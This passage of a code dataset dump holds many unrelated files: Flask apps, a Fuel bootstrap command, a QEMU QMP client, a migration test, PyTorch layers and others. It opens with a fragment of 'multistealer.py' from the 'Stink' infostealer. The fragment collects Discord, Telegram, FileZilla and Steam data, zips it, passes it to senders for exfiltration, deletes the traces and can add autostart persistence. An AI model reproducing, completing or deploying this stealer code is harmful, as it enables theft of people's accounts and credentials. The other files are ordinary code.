(Features.discord in features or Features.all in features) else False\n },\n {\n \"object\": Telegram(\n self.__config.StoragePath,\n r\"Programs\\Telegram\",\n self.__errors\n ),\n \"status\": True if (Features.telegram in features or Features.all in features) else False\n },\n {\n \"object\": FileZilla(\n self.__config.StoragePath,\n r\"Programs\\FileZilla\",\n self.__errors\n ),\n 
\"status\": True if (Features.filezilla in features or Features.all in features) else False\n },\n {\n \"object\": Steam(\n self.__config.StoragePath,\n r\"Programs\\Steam\",\n self.__errors\n ),\n \"status\": True if (Features.steam in features or Features.all in features) else False\n }\n ]\n\n def __create_storage(self) -> None:\n \"\"\"\n Creates storage for the Stink.\n :return: None\n \"\"\"\n if not path.exists(self.__config.StoragePath):\n makedirs(self.__config.StoragePath)\n else:\n rmtree(self.__config.StoragePath)\n makedirs(self.__config.StoragePath)\n\n def __create_archive(self) -> None:\n \"\"\"\n Creates a data archive.\n :return: None\n \"\"\"\n make_archive(rf\"{path.dirname(self.__config.StoragePath)}\\{self.__config.ZipName}\", \"zip\", self.__config.StoragePath)\n\n def __delete_files(self) -> None:\n \"\"\"\n Deletes the archive and storage.\n :return: None\n \"\"\"\n rmtree(self.__config.StoragePath)\n remove(rf\"{path.dirname(self.__config.StoragePath)}\\{self.__config.ZipName}.zip\")\n\n def run(self) -> None:\n \"\"\"\n Launches the Stink.\n :return: None\n \"\"\"\n try:\n\n self.__create_storage()\n\n with Pool(processes=self.__config.PoolSize) as pool:\n pool.map(functions.run_process, [\n method[\"object\"] for method in self.__methods if method[\"status\"] is True\n ])\n\n pool.close()\n\n self.__create_archive()\n\n for sender in self.__senders:\n sender.run(self.__config.ZipName, self.__config.StoragePath, self.__errors)\n\n self.__delete_files()\n\n if self.__autostart is True:\n Autostart(argv[0], self.__errors).run()\n\n if self.__message is True:\n Message(self.__errors).run()\n\n except Exception as e:\n if self.__errors is True: print(f\"[Multistealer]: {repr(e)}\")\n","sub_path":"stink/multistealer.py","file_name":"multistealer.py","file_ext":"py","file_size_in_byte":7326,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"502162064","text":"# -*- coding: utf-8 -*-\n\n# Copyright 2015 Mirantis, Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nfrom fuel_bootstrap.commands import base\nfrom fuel_bootstrap.utils import bootstrap_image as bs_image\n\n\nclass ActivateCommand(base.BaseCommand):\n \"\"\"Activate specified bootstrap image.\"\"\"\n\n def get_parser(self, prog_name):\n parser = super(ActivateCommand, self).get_parser(prog_name)\n parser.add_argument(\n 'id',\n type=str,\n metavar='ID',\n help=\"ID of bootstrap image to be activated.\"\n )\n return parser\n\n def take_action(self, parsed_args):\n super(ActivateCommand, self).take_action(parsed_args)\n # cliff handles errors by itself\n image_uuid = bs_image.activate(parsed_args.id)\n self.app.stdout.write(\"Bootstrap image {0} has been activated.\\n\"\n .format(image_uuid))\n","sub_path":"contrib/fuel_bootstrap/fuel_bootstrap_cli/fuel_bootstrap/commands/activate.py","file_name":"activate.py","file_ext":"py","file_size_in_byte":1441,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"625150045","text":"var = []\ndef media(a,b,c):\n\tif ((a < b) and (a > c)) or ((a > b) and (a < c)):\n\t\tvar.append(a)\n\t\t#print(a)\n\telif ((b < a) and (b > c)) or ((b > a) and (b < c)):\n\t\tvar.append(b)\n\t\t#print(b)\n\telif ((c < a) and (c > b)) or ((c > a) and (c < b)):\n\t\tvar.append(c)\n\t\t#print(c)\n\nprint(\"ingrese\")\nentr = input()\nentr2 = int(entr)\n\nfor i in range(0,entr2):\n\tentr3 = input()\n\tentr4 = entr3.split()\n\tfor n in range(0, len(entr4)):\n\t\tentr4[n] = int(entr4[n])\n\tmedia(entr4[0],entr4[1],entr4[2])\n\nprint(*var, sep=' ')\n","sub_path":"python/media.py","file_name":"media.py","file_ext":"py","file_size_in_byte":504,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"109000882","text":"from app import app, cachedb, logger\nfrom flask import render_template\nfrom app.searcher import Searcher\n\n\n@app.route('/')\ndef index():\n return render_template(\"index.html\")\n\n\n@app.route('/search/')\ndef search(name):\n logger.info(f\"搜索 : {name}\")\n result = Searcher.search(name)\n cachedb.clear() # 每次搜索前清空临时数据库\n result_json = []\n for video_list in result:\n cachedb.add_video_list(video_list) # 保存结果到临时数据库\n result_json.append(video_list.json())\n logger.info(f\"搜索结果: {len(result_json)} 条\")\n return render_template(\"result.html\", result=result_json)\n\n\n@app.route('/playlist/')\ndef get_playlist(list_hash):\n video_list = cachedb.get_video_list(list_hash)\n if not video_list:\n return '视频不存在'\n logger.info(f\"获取视频列表: {video_list.title} ({video_list.num}集) {video_list.hash}\")\n video_list_json = video_list.json()['videos']\n return render_template('playlist.html', video_list=video_list_json)\n\n\n@app.route('/video/')\ndef get_video(video_hash):\n video = cachedb.get_video(video_hash)\n handler = video.handler(video.raw_url, video.type)\n logger.info(f\"请求 : {video.name} {video.type}\")\n return handler.make_response()\n","sub_path":"app/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":1295,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"605416215","text":"from flask import Flask, request, render_template, flash\nfrom flask_sqlalchemy import SQLAlchemy\nimport json\nimport app_config as config\n\n# Create Flask Application\napp = Flask(__name__, template_folder='templates')\napp.config.from_object(config)\n# Create database object\ndb = SQLAlchemy(app)\n\n\n@app.route(\"/\", methods=[\"GET\", \"POST\"])\ndef index():\n from models import Post, Comment\n from forms import PostForm, CommentForm\n # Retrieve all posts from DB\n if request.method == 'GET':\n posts = Post.query.all()\n result = []\n for post in posts:\n # Retrieve comments that belong to this post\n comments = Comment.query.filter_by(post_id = post.id)\n result.append({\"post\": post, \"comments\": comments})\n # Render Blog template\n return render_template('index.html', data=result)\n # Creating post or comment\n elif request.method == \"POST\":\n # 'request_type' is 'post' or 'comment'\n request_type = request.form.get(\"request_type\")\n # Creating Post\n if request_type == \"post\":\n form = PostForm(request.form)\n if form.validate():\n post = Post(**form.data)\n db.session.add(post)\n db.session.commit()\n return \"Post saved\"\n else:\n return \"Erorr\", 400\n # Creating comment for post\n elif request_type == \"comment\":\n form = CommentForm(request.form)\n if form.validate():\n comment = Comment(**form.data)\n db.session.add(comment)\n db.session.commit()\n return \"Comment saved\"\n else:\n return \"Erorr\", 400\n else:\n return \"Wrong request type\", 400\n\nif __name__ == \"__main__\":\n from models import *\n db.create_all()\n app.run()","sub_path":"lesson14/imgbrd/imgbrd_app.py","file_name":"imgbrd_app.py","file_ext":"py","file_size_in_byte":1872,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"126410605","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: ./pilasengine/habilidades/eliminarse_si_sale_de_pantalla.py\n# Compiled at: 2016-08-25 20:52:02\nfrom pilasengine import habilidades\n\nclass EliminarseSiSaleDePantalla(habilidades.Habilidad):\n \"\"\"Se asegura de que el actor sea eliminado si sale de los\n bordes de la pantalla.\n \"\"\"\n\n def iniciar(self, receptor):\n u\"\"\"\n :param receptor: El actor que aprenderá la habilidad.\n \"\"\"\n super(EliminarseSiSaleDePantalla, self).iniciar(receptor)\n self.ancho, self.alto = self.pilas.obtener_area()\n self.camara = self.pilas.escena_actual().camara\n\n def actualizar(self):\n if self.receptor.derecha < -(self.ancho / 2) + self.camara.x:\n self.eliminar_actor()\n elif self.receptor.izquierda > self.ancho / 2 + self.camara.x:\n self.eliminar_actor()\n if self.receptor.abajo > self.alto / 2 + self.camara.y:\n self.eliminar_actor()\n elif self.receptor.arriba < -(self.alto / 2) + self.camara.y:\n self.eliminar_actor()\n\n def eliminar_actor(self):\n self.receptor.eliminar()","sub_path":"pycfiles/pilas-1.4.9.tar/eliminarse_si_sale_de_pantalla.py","file_name":"eliminarse_si_sale_de_pantalla.py","file_ext":"py","file_size_in_byte":1249,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"536187944","text":"# -*- coding: utf-8 -*-\n\nimport os\nd = os.path.dirname(os.path.abspath(__file__))\nd_cf = '/home/www/pyprojects/config/'\n\n# initiate thread-safe storage\nimport threading\n_local = threading.local()\ndef local(name):\n if not hasattr(_local, name):\n setattr(_local, name, {})\n return getattr(_local, name)\n\n# initiate config\nimport ConfigParser\ndef config(name='common'):\n _config = local('config')\n if name not in _config:\n _config[name] = ConfigParser.ConfigParser()\n _config[name].read([d + '/default/' + name + '.ini', d + '/' + name + '.ini', d_cf + name + '.ini'])\n return _config[name]","sub_path":"config/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":624,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"254745703","text":"import requests\nimport json\nfrom sqlalchemy import delete\nfrom db.sqlalchemydb import engine, locations_table\nfrom db.db_delete import deleteLocationData, deleteStationData\n\nprint('\\nBateria de testes\\n')\n## Creating location\ntry:\n url = 'http://127.0.0.1:5000/v1/premises'\n dados = {\"name\": 'GreenPeace',\n \"address\": 'Fradique Coutinho,352'\n }\n datajson = json.dumps(dados)\n answer = requests.post(url, json=dados)\n answer = json.loads(answer.text)\n print('[x]Location Created')\nexcept:\n print(\"[ ]Location Created\")\n\n## Creating Stations\ntry:\n url = 'http://127.0.0.1:5000/v1/stations'\n dados = {\"serial\": '123456',\n \"premise_id\": 111,\n \"name\": 'Umbrella Corp'\n }\n datajson = json.dumps(dados)\n answer = requests.post(url, json=dados)\n answer = json.loads(answer.text)\n print('[x]Station Created')\nexcept:\n print(\"[ ]Station Created\")\n\n## Getting location list\ntry:\n url = 'http://127.0.0.1:5000/v1/premises'\n answer = requests.get(url)\n print('[x]List of locations')\nexcept:\n print('[ ]List of locations')\n\n\n## Deleting created location\ntry:\n deleteLocationData('GreenPeace')\n deleteStationData('Umbrella Corp')\n print('[x]Test data deleted')\nexcept:\n print('[ ]Test data deleted')","sub_path":"teste_unitário.py","file_name":"teste_unitário.py","file_ext":"py","file_size_in_byte":1298,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"575591565","text":"# -*- coding: utf-8 -*-\nfrom plone.namedfile.utils import set_headers, stream_data\nfrom Products.CMFCore.utils import getToolByName\nfrom zope.component import getMultiAdapter\nfrom zope.publisher.interfaces import NotFound\n\nimport re\n\n\nclass VersionView(object):\n\n def __call__(self):\n version_id = self.request.version_id\n content_core_view = getMultiAdapter((self.context, self.request), name='content-core')\n html = content_core_view()\n return re.sub(\n r'''/@@download/(?P.*?)/(?P.*?)\"''',\n r'''/@@download-version?field_id=\\g&filename=\\g&version_id=''' + version_id + '\"',\n html\n )\n\n\nclass DownloadVersion(object):\n\n def __call__(self):\n version_id = self.request.version_id\n field_id = self.request.field_id\n filename = self.request.filename\n repository = getToolByName(self.context, 'portal_repository')\n old_obj = repository.retrieve(self.context, version_id).object\n file_ = getattr(old_obj, field_id)\n\n if file_ is None:\n raise NotFound(self, filename, self.request)\n\n set_headers(file_, self.request.response, filename=filename)\n\n return stream_data(file_)\n","sub_path":"buildout-cache--/eggs/plone.app.versioningbehavior-1.2.2-py2.7.egg/plone/app/versioningbehavior/browser.py","file_name":"browser.py","file_ext":"py","file_size_in_byte":1254,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"69799962","text":"from typing import List, Tuple\n\nfrom allennlp.common import JsonDict\nfrom allennlp.data import Instance\nfrom allennlp.data.dataset_readers.dataset_utils import bio_tags_to_spans\nfrom allennlp.predictors import Predictor\n\n\n@Predictor.register('smartdata-eventx-predictor')\nclass SmartdataEventxPredictor(Predictor):\n def _json_to_instance(self, json_dict: JsonDict) -> Instance:\n ner_tags = json_dict['ner_tags']\n trigger_spans, entity_spans = self._extract_trigger_and_entity_spans(ner_tags)\n return self._dataset_reader.text_to_instance(tokens=json_dict['tokens'],\n ner_tags=ner_tags,\n entity_spans=entity_spans,\n trigger_spans=trigger_spans)\n\n @staticmethod\n def _extract_trigger_and_entity_spans(ner_tags):\n entity_types_with_spans = bio_tags_to_spans(ner_tags)\n triggers_with_spans = [type_span\n for type_span in entity_types_with_spans\n if type_span[0].lower() == 'trigger']\n trigger_spans = SmartdataEventxPredictor._extract_exclusive_spans(triggers_with_spans)\n entity_spans = SmartdataEventxPredictor._extract_exclusive_spans(entity_types_with_spans)\n return trigger_spans, entity_spans\n\n @staticmethod\n def _extract_exclusive_spans(\n types_with_spans: List[Tuple[str, Tuple[int, int]]]\n ) -> List[Tuple[int, int]]:\n return [(t[1][0], t[1][1] + 1) for t in types_with_spans]\n\n","sub_path":"eventx/predictors/smartdata_predictor.py","file_name":"smartdata_predictor.py","file_ext":"py","file_size_in_byte":1588,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"294913642","text":"from turtle import *\n\ndef regularShape(n, size):\n\tfor x in range(n):\n\t\tforward(size)\n\t\tleft(360.0/n)\n\n\nclass Point(object):\n\tdef __init__(self, x, y):\n\t\tsuper(Point, self).__init__()\n\t\tself.x = x\n\t\tself.y = y\n\npoints = [\n\tPoint(50,20),\n\tPoint(50,40),\n\tPoint(0,-20),\n\tPoint(-10,-40),\n\tPoint(10,0),\n]\n\n# for x in range(len(points)):\n\t# setposition(points[x].x, points[x].y)\n\ndef main():\n\tspeed('fastest')\n\tregularShape(360,1)\n\nmain()\n\nraw_input()","sub_path":"draw.py","file_name":"draw.py","file_ext":"py","file_size_in_byte":444,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"72512075","text":"# encoding: utf-8\n\nimport socket\nimport logging\nimport os\nimport json\nlogger = logging.getLogger('QMP')\n\nclass QMPError(Exception):\n pass\n\nclass QMPConnectionError(Exception):\n pass\n\nclass QMP(object):\n def __init__(self):\n self._connection = None\n\n def connect_socket(self, path):\n \"\"\"\n Connecto qmp socket\n \"\"\"\n\n s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)\n if os.path.exists(path):\n try:\n s.connect(path)\n # empty buffer and wait for hello\n s.recv(1024)\n self._connection=s\n return\n except socket.error as e:\n if e.errno == 98:\n raise QMPConnectionError(\"Cannot connect to virtual, \" +\n \"socket '%s' already on use\" % path)\n if e.errno == 111:\n raise QMPConnectionError(\"Cannot connect to virtual, \" +\n \"connection refused\")\n\n logger.exception(e)\n logger.error(\"Cannot open socket\")\n raise QMPConnectionError(\"Cannot connect to virtual, socket\" +\n \" '%s' unavailable\" % path)\n else:\n raise QMPConnectionError(\"Cannot connect to virtual, socket\" +\n \" '%s' not found\" % path)\n return\n\n def query(self, query, arguments={}):\n \"\"\"\n Execute query to socket\n \"\"\"\n if not self._connection:\n raise QMPError(\"Not connected\")\n q = {'execute': query}\n if arguments:\n q['arguments'] = arguments\n self._connection.send(json.dumps(q))\n self._connection.send(\"\\n\")\n retval = ''\n while True:\n t = self._connection.recv(1024)\n if len(t) > 2:\n retval = retval + t\n if \"\\n\" in retval:\n break\n else:\n break\n retval = json.loads(retval)\n if 'error' in retval:\n raise QMPError(retval['error'])\n return retval['return']\n\n def qmp_vminfo(self):\n try:\n retval = self.qmp_query('query-name')\n if retval:\n print(\"VM name:\\t\\t%s\" % retval['name'])\n except QMPError as e:\n logger.error(e)\n\n try:\n retval = self.qmp_query('query-uuid')\n if retval:\n print(\"UUID:\\t\\t\\t%s\" % retval['UUID'])\n except QMPError as e:\n logger.error(e)\n\n try:\n retval = self.qmp_query('query-status')\n if retval:\n a = ''\n if retval['singlestep']:\n a = \"(singlestep)\"\n print(\"running:\\t\\t%s %s\" % (retval['running'], a))\n except QMPError as e:\n logger.error(e)\n\n print(\"\")\n try:\n retval = self.qmp_query('query-kvm')\n if retval:\n if not retval['present']:\n print(\"KVM enabled:\\t\\t%s\" % retval['enabled'])\n print(\"KVM active:\\t\\t%s\" % retval['present'])\n\n except QMPError as e:\n logger.error(e)\n\n\n\n print(\"\\nCPU:\\t\\t\\tthread id\")\n try:\n retval = self.qmp_query('query-cpus')\n if retval:\n for cpu in retval:\n if cpu['halted']:\n print(\" CPU%(CPU)s (halted):\\t\\t%(thread_id)s\" % cpu)\n else:\n print(\" CPU%(CPU)s:\\t\\t\\t%(thread_id)s\" % cpu)\n\n except QMPError as e:\n logger.error(e)\n\n print(\"\\nBlock devices:\")\n try:\n retval = self.qmp_query('query-block')\n if retval:\n for device in retval:\n d = {\n 'readonly' : False,\n 'drv' : None,\n 'encrypted': False,\n 'filename' : None,\n 'device' : None,\n 'locked' : False,\n \"removable\" : False,\n \"type\" : None\n }\n # {\"device\": \"virtio0\", \"locked\": false, \"removable\": false,\n # \"inserted\": {\"ro\": false, \"drv\": \"raw\", \"encrypted\": false, \"file\": \"/home/virtuals/images/dynamiitti_1.img\"},\n # \"type\": \"hd\"}\n if 'inserted' in device:\n if \"ro\" in device['inserted']:\n d['readonly'] = device['inserted'][\"ro\"]\n if \"drv\" in device['inserted']:\n d['drv'] = device['inserted'][\"drv\"]\n if \"encrypted\" in device['inserted']:\n d['encrypted'] = 
device['inserted'][\"encrypted\"]\n if \"file\" in device['inserted']:\n d['filename'] = device['inserted'][\"file\"]\n if 'device' in device:\n d['device'] = device['device']\n if 'type' in device:\n d['type'] = device['type']\n if 'locked' in device:\n d['locked'] = device['locked']\n if 'removable' in device:\n d['removable'] = device['removable']\n opts = []\n if d['removable']:\n opts.append('removable')\n if d['locked']:\n opts.append('locked')\n if d['readonly']:\n opts.append('readonly')\n if d['encrypted']:\n opts.append('encrypted')\n d['opts'] = ','.join(opts)\n print(\" Device %(type)s\\t\\t%(device)s (%(opts)s)\" % d)\n if d['filename']:\n print(\" file:\\t\\t\\t%(filename)s\" % d)\n print(\"\")\n except QMPError as e:\n logger.error(e)\n","sub_path":"km/qmp.py","file_name":"qmp.py","file_ext":"py","file_size_in_byte":6166,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"540724666","text":"from flask import Flask, render_template\n\napp = Flask(__name__)\n\nposts = [\n {\n 'author': 'John Doe',\n 'title': 'Sample Blog Post',\n 'content': 'This is the post.',\n 'date_posted': 'January 21, 2021'\n }, {\n 'author': 'Bob Sanders',\n 'title': 'Alternate Post',\n 'content': 'Hello universe.',\n 'date_posted': 'March 7th, 2018'\n }\n]\n\n\n@app.route('/')\n@app.route('/home')\ndef home():\n return render_template('home.html', posts=posts)\n\n\n@app.route('/about')\ndef about():\n return render_template('about.html')\n\n\nif __name__ == '__main__':\n app.run()\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":617,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"444408953","text":"import torch\nfrom torch import optim\nfrom torch import nn\n\n\ndef get_optim(params, target):\n\n assert isinstance(target, nn.Module) or isinstance(target, dict)\n\n if isinstance(target, nn.Module):\n target = target.parameters()\n\n if params['optimizer'] == 'sgd':\n optimizer = optim.SGD(target, params['lr'], weight_decay=params['wd'])\n elif params['optimizer'] == 'momentum':\n optimizer = optim.SGD(\n target, params['lr'], momentum=0.9, weight_decay=params['wd'])\n elif params['optimizer'] == 'nesterov':\n optimizer = optim.SGD(target, params['lr'], momentum=0.9,\n weight_decay=params['wd'], nesterov=True)\n elif params['optimizer'] == 'adam':\n optimizer = optim.Adam(target, params['lr'], weight_decay=params['wd'])\n elif params['optimizer'] == 'amsgrad':\n optimizer = optim.Adam(\n target, params['lr'], weight_decay=params['wd'], amsgrad=True)\n elif params['optimizer'] == 'rmsprop':\n optimizer = optim.RMSprop(target, params['lr'], weight_decay=params['wd'])\n else:\n raise ValueError\n\n return optimizer\n\n\ndef denorm(x):\n out = (x + 1) / 2\n return out.clamp(0, 1)\n","sub_path":"src/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1137,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"252410398","text":"from flask import Flask\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_migrate import Migrate\nfrom flask_marshmallow import Marshmallow\nfrom marshmallow.exceptions import ValidationError\nfrom .configs import Config\n\n\ndb = SQLAlchemy()\nmigrate = Migrate()\n\nma = Marshmallow()\n\n\ndef register_blueprint(app):\n from .endpoints import blueprint as pedidos\n\n app.register_blueprint(pedidos)\n\ndef register_error_handlers(app):\n @app.errorhandler(ValidationError)\n def validation_error_handler(e):\n return e.massages,400\n \ndef create_app():\n app = Flask(__name__)\n app.config.from_object(Config)\n\n register_blueprint(app)\n register_error_handlers(app)\n db.init_app(app)\n migrate.init_app(app, db)\n ma.init_app(app)\n\n return app\n","sub_path":"pedidos/src/project/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":774,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"369669388","text":"# Copyright 2016 Mirantis, Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nimport alembic\nfrom oslo_serialization import jsonutils\nimport sqlalchemy as sa\n\nfrom nailgun.db import db\nfrom nailgun.db import dropdb\nfrom nailgun.db.migration import ALEMBIC_CONFIG\nfrom nailgun.test import base\n\n_prepare_revision = '675105097a69'\n_test_revision = 'c6edea552f1e'\n\nJSON_TASKS = [\n {\n 'id': 'post_deployment_end',\n 'type': 'stage',\n 'requires': ['post_deployment_start']\n },\n {\n 'id': 'primary-controller',\n 'parameters': {'strategy': {'type': 'one_by_one'}},\n 'required_for': ['deploy_end'],\n 'requires': ['deploy_start'],\n 'role': ['primary-controller'], # legacy notation should be converted\n # to `roles`\n 'type': 'group'\n },\n {\n 'id': 'cross-dep-test',\n 'type': 'puppet',\n 'cross-depended-by': ['a', 'b'],\n 'cross-depends': ['c', 'd']\n },\n {\n 'id': 'custom-test',\n 'type': 'puppet',\n 'test_pre': {'k': 'v'},\n 'test_post': {'k': 'v'}\n }\n]\n\n\ndef setup_module():\n dropdb()\n alembic.command.upgrade(ALEMBIC_CONFIG, _prepare_revision)\n prepare()\n alembic.command.upgrade(ALEMBIC_CONFIG, _test_revision)\n\n\ndef prepare():\n meta = base.reflect_db_metadata()\n\n result = db.execute(\n meta.tables['releases'].insert(),\n [{\n 'name': 'test_name',\n 'version': '2015.1-8.0',\n 'operating_system': 'ubuntu',\n 'state': 'available',\n }])\n release_id = result.inserted_primary_key[0]\n\n cluster_ids = []\n for cluster_name in ['test_env1', 'test_env2']:\n result = db.execute(\n meta.tables['clusters'].insert(),\n [{\n 'name': cluster_name,\n 'release_id': release_id,\n 'mode': 'ha_compact',\n 'status': 'new',\n 'net_provider': 'neutron',\n 'grouping': 'roles',\n 'fuel_version': '10.0'\n }])\n cluster_ids.append(result.inserted_primary_key[0])\n\n result = db.execute(\n meta.tables['plugins'].insert(),\n [{\n 'name': 'test_plugin_a',\n 'title': 'Test plugin A',\n 'version': '2.0.0',\n 'description': 'Test plugin A for Fuel',\n 'homepage': 'http://fuel_plugins.test_plugin.com',\n 'package_version': '4.0.0',\n 'groups': jsonutils.dumps(['tgroup']),\n 'authors': jsonutils.dumps(['tauthor']),\n 'licenses': jsonutils.dumps(['tlicense']),\n 'releases': jsonutils.dumps([\n {'repository_path': 'repositories/ubuntu'}\n ]),\n 'deployment_tasks': jsonutils.dumps(JSON_TASKS),\n 'fuel_version': jsonutils.dumps(['8.0']),\n 'network_roles_metadata': jsonutils.dumps([{\n 'id': 'admin/vip',\n 'default_mapping': 'fuelweb_admin',\n 'properties': {\n 'subnet': True,\n 'gateway': False,\n 'vip': [\n {\n 'name': 'my-vip1',\n 'namespace': 'my-namespace1',\n },\n {\n 'name': 'my-vip2',\n 'namespace': 'my-namespace2',\n }\n ]\n }\n }])\n }]\n )\n plugin_a_id = result.inserted_primary_key[0]\n\n result = db.execute(\n meta.tables['plugins'].insert(),\n [{\n 'name': 'test_plugin_b',\n 'title': 'Test plugin B',\n 'version': '2.0.0',\n 'description': 'Test plugin B for Fuel',\n 'homepage': 'http://fuel_plugins.test_plugin.com',\n 'package_version': '4.0.0',\n 
'groups': jsonutils.dumps(['tgroup']),\n 'authors': jsonutils.dumps(['tauthor']),\n 'licenses': jsonutils.dumps(['tlicense']),\n 'releases': jsonutils.dumps([\n {'repository_path': 'repositories/ubuntu'}\n ]),\n 'fuel_version': jsonutils.dumps(['8.0']),\n 'network_roles_metadata': jsonutils.dumps([{\n 'id': 'admin/vip',\n 'default_mapping': 'fuelweb_admin',\n 'properties': {\n 'subnet': True,\n 'gateway': False,\n 'vip': [\n {\n 'name': 'my-vip3',\n 'namespace': 'my-namespace3',\n },\n {\n 'name': 'my-vip4',\n 'namespace': 'my-namespace4',\n }\n ]\n }\n }])\n }]\n )\n plugin_b_id = result.inserted_primary_key[0]\n\n db.execute(\n meta.tables['cluster_plugin_links'].insert(),\n [\n {\n 'cluster_id': cluster_ids[0],\n 'title': 'title',\n 'url': 'http://www.zzz.com',\n 'description': 'description',\n 'hidden': False\n },\n # this is duplicate, should be deleted during migration\n {\n 'cluster_id': cluster_ids[1],\n 'title': 'title',\n 'url': 'http://www.zzz.com',\n 'description': 'description_duplicate',\n 'hidden': False\n },\n # duplicate by URL but in another cluster, should\n # not be deleted\n {\n 'cluster_id': cluster_ids[0],\n 'title': 'title',\n 'url': 'http://www.zzz.com',\n 'description': 'description',\n 'hidden': False\n }\n ]\n )\n\n db.execute(\n meta.tables['plugin_links'].insert(),\n [\n {\n 'plugin_id': plugin_a_id,\n 'title': 'title',\n 'url': 'http://www.zzz.com',\n 'description': 'description',\n 'hidden': False\n },\n # this is duplicate, should be deleted during migration\n {\n 'plugin_id': plugin_b_id,\n 'title': 'title',\n 'url': 'http://www.zzz.com',\n 'description': 'description_duplicate',\n 'hidden': False\n }\n ]\n )\n\n db.commit()\n\n\nclass TestPluginLinksConstraints(base.BaseAlembicMigrationTest):\n # see initial data in setup section\n def test_plugin_links_duplicate_cleanup(self):\n links_count = db.execute(\n sa.select(\n [sa.func.count(self.meta.tables['plugin_links'].c.id)]\n )).fetchone()[0]\n self.assertEqual(links_count, 1)\n\n def test_cluster_plugin_links_duplicate_cleanup(self):\n links_count = db.execute(\n sa.select(\n [sa.func.count(self.meta.tables['cluster_plugin_links'].c.id)]\n )).fetchone()[0]\n self.assertEqual(links_count, 2)\n","sub_path":"nailgun/nailgun/test/unit/test_migration_fuel_10_0.py","file_name":"test_migration_fuel_10_0.py","file_ext":"py","file_size_in_byte":7733,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"520049542","text":"class Solution:\n def reverseWords(self, s):\n s.reverse()\n s.append(' ')\n start = 0\n for i in range(len(s)):\n if s[i] == ' ':\n s[start:i] = reversed(s[start:i])\n start = i + 1\n s.pop()\n","sub_path":"186/186.reverse-words-in-a-string-ii.270738852.Accepted.leetcode.py","file_name":"186.reverse-words-in-a-string-ii.270738852.Accepted.leetcode.py","file_ext":"py","file_size_in_byte":263,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"58591767","text":"import torch\nimport torch.nn as nn\n\nclass SEBlock(nn.Module):\n\n def __init__(self,planes):\n super(SEBlock,self).__init__()\n self.avgpool = nn.AdaptiveAvgPool1d(1)\n self.maxpool = nn.AdaptiveMaxPool1d(1)\n self.fc1 = nn.Conv1d(planes, planes//8, kernel_size=1)\n self.fc2 = nn.Conv1d(planes//8, planes, kernel_size=1)\n self.relu = nn.ReLU(True)\n self.sigmoid = nn.Sigmoid()\n\n def forward(self,x):\n avgtmp = self.avgpool(x)\n maxtmp = self.maxpool(x)\n tmp = avgtmp + maxtmp\n tmp = self.fc1(tmp)\n tmp = self.relu(tmp)\n tmp = self.fc2(tmp)\n tmp = self.sigmoid(tmp)\n return x * tmp\n\nclass CAMBlock(nn.Module):\n\n def __init__(self):\n super(CAMBlock,self).__init__()\n self.maxpool = nn.AdaptiveMaxPool1d(1)\n self.avgpool = nn.AdaptiveAvgPool1d(1)\n self.conv = nn.Conv1d(2, 1, 7, padding = 3)\n self.sigmoid = nn.Sigmoid()\n\n def forward(self,x):\n x_tmp = x.permute([0,2,1])\n maxpool_output = self.maxpool(x_tmp)\n avgpool_output = self.avgpool(x_tmp)\n x_tmp = torch.cat([maxpool_output,avgpool_output],dim = -1)\n x_tmp = x_tmp.permute([0,2,1])\n x_tmp = self.sigmoid(self.conv(x_tmp))\n return x * x_tmp\n\n\nclass CNNBlock(nn.Module):\n\n def __init__(self,in_channel,out_channel):\n super(CNNBlock,self).__init__()\n self.convt = 